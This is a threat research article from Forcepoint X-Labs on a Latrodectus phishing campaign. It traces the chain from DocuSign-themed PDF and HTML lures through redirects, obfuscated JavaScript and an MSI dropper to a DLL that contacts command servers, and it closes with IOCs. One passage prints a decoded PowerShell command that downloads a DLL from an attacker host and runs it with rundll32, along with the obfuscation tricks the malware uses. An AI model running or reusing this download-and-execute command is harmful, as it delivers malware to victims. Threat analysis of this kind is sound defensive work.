Inside the Latrodectus Malware Campaign Old School Phishing Meets Innovative Payload Delivery

www.forcepoint.com · Mayur Sewani · 1 year ago · research
quality 7/10 · good
0 net
Tags
malware phishing campaign
Inside the Latrodectus Malware Campaign - Forcepoint Skip to main content Email Security,Awareness Inside the Latrodectus Malware Campaign Old school phishing meets innovative payload delivery October 18, 2024 | 0 min read Get a Demo of Forcepoint Solutions Mayur Sewani Research Email Security Data Security Everywhere This report offers an in-depth analysis of recent Latrodectus campaign activity uncovered by our X-Labs research team. One of the principal dissemination techniques for Latrodectus involves phishing emails, leveraging infrastructure like that of IcedID. Latrodectus primarily targets financial, automotive and healthcare business sectors. By compromising email accounts and distributing malicious attachments, it propagates across a broader network of potential targets. Currently, threat actors are increasingly adopting Latrodectus, utilizing prevalent attachment formats such as HTML and PDF. It is typically engineered for stealth and persistence, complicating detection and eradication efforts. This can lead to the exfiltration of personal data, financial losses due to fraud or extortion, and the compromise of sensitive information. The Latrodectus campaign initiates with attacks originating from a compromised email that appears to contain critical DocuSign documents. Users are encouraged to access the document via the provided link. When the link is clicked, users are redirected to a malicious URL, resulting in the inadvertent download of the next-stage payload. Fig. 1 - Attack chain Fig. 2 - Initial access PDF Fig. 3 - PDF suspicious embedded URL PDF contains compromised domain with redirection: “hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW” It redirects to shortner URLs to another suspicious domain: “hxxps://digitalpinnaclepub[.]com/?3” and finally redirects to “storage.googleapis.com” project to download malicious obfuscated JavaScricpt “hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js” Obfuscated JavaScript Analysis: JavaScript contains a lot of junk messages in “//” which increases obfuscation and file size. Actual malicious JavaScript code is commented in “////” Fig. 4 - Obfuscated JavaScript payload After removing junk messages, it shows obfuscated JavaScript string manipulation replace and join functions. Replacing “////” with a space (“ “) shows actual malcode. Fig. 5 - Deobfuscated Javascript string manipulation functions After deobfuscation, it creates ActiveXObject("WindowsInstaller.Installer") and downloads a .msi installer file. See Fig. 6 below: Fig. 6 - Deobfuscated Javascript code downloads MSI file MSI Analysis: MSI file is executed via JavaScript and drops malicious 64-bit .dll file in %appdata%. It also executes .dll with rundll32.exe using export function parameters. Fig. 7 - MSI file Dropped .dll contains export function “ GetDeepDVCState ” and MSIexecute this .dll with parameter “/DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\Admin\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCState” DLL Analysis: DLL is a Microsoft Visual C++ 64-bit binary with fake NVIDIA version information: Fig. 8 - DLL vesion info Upon analysis, this DLL unpacks another stage DLL payload in memory: Fig. 9 - DLL verion info. Unpacked 64-bit dll binary connects to malicious C2 server on unusual port 8041. Greshunka[.]com:8041/bazar.php Initial Access via HTML Phishing HTML page which looks like a Word document pop-up to the user. Clicking on the button executes malicious JavaScript code embedded in HTML. See Fig. 10 below: Fig. 10 - HTML attachment It contains pop-up warning messages in reverse order: “document.getElementById("prompt").innerHTML = ll('.nottub >b/<"noituloS">b< eht gnisu woleb snoitcurtsni eht wollof esaelP .tnemucod siht fo yalpsid enilffo tcerroc troppus ton seod resworb ruoY');” Reversed message: Your browser does not support correct offline display of this document. Please follow the instructions below using the It also uses different string encoding window.atob() and obfuscation functions s.split("").reverse().join(""); Fig. 11 - Suspicious code in HTML Decoded base64 code cmd /c start /min powershell $path='%appdata%\witwin_st_x64.dll';iwr hxxp://gertioma[.]top/o.jpg -outfile $path; start-process rundll32 $path,NxReleasePMap8== It shows threat actors try to use HTML to launch PowerShell and directly downloads the DLL payload without MSI and executes it with rundll32.exe and connects to C2. We have observed few campaigns with an HTML attachment in compromised emails. Conclusion: Threat actors continue to use older emails to target users via suspicious PDF or HTML attachments. They use a redirection method with URL shorteners and host malicious payloads on well-known storage[.]googleapis[.]com hosting projects. Then downloads obfuscated JavaScript to download MSI and uses rundll32.exe to execute 64-bit DLL. This campaign mixes the old with the new. Latrodectus leverages older infrastructure, combined with a new, innovative malware payload distribution method to financial, automotive and business sectors. Protection statement: Forcepoint customers are protected against this threat at the following stages of attack: Stage 2 (Lure) – Malicious PDF and HTML attachments associated with these attacks are identified and blocked. Stage 3 (Redirect) – Blocked redirectional shortened URLs and compromised domains Stage 5 (Dropper File) - The dropper files are added to Forcepoint malicious database and are blocked. Stage 6 (Call Home) - Blocked C2 credentials IOCs Initial Stage URLs: hxxps://delview[.]com/MobileDefault[.]aspx?reff=hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW hxxps://cutt[.]ly/seU8MT6t#_fZ0NmW hxxps://digitalpinnaclepub[.]com/?3 hxxps://storage[.]googleapis[.]com/braided-turbine-435813-n7[.]appspot[.]com/VA8PBxartt/Document-20-17-57.js hxxp://194[.]54[.]156[.]91/dsa.msi hxxp://gertioma[.]top/o.jpg C2s: tiguanin[.]com greshunka[.]com bazarunet[.]com mazinom[.]com leroboy[.]com krinzhodom[.]com klemanzino[.]net rilomenifis[.]com isomicrotich[.]com Hashes: 35A990C3BE798108C9D12A47F4A028468EA6095B 9361621490915EBB919B79C6101874F03E4E51BC 71E99A21FFA29E1E391811F5A3D04DCBB9CF0949 570c4ab78cf4bb22b78aac215a4a79189d4fa9ed 62e23500cc5368e37be47371342784f72e481647 881993bcb37aa9504249271b7559addc0c633f09 7474873629399ee5fdd984c99b705e0490ab8707 Mayur Sewani Mayur serves as a Senior Security Researcher as part of the Forcepoint X-Labs Research Team. He focuses on APT malwares, information stealers, phishing attacks, and also works to stay on top of the latest threats. He is passionate about advancing the field of defensive adversary emulation and research. Read more articles by Mayur Sewani In the Article X-Labs Get insight, analysis & news straight to your inbox To the Point Cybersecurity A Podcast covering latest trends and topics in the world of cybersecurity Listen Now
← Back to stories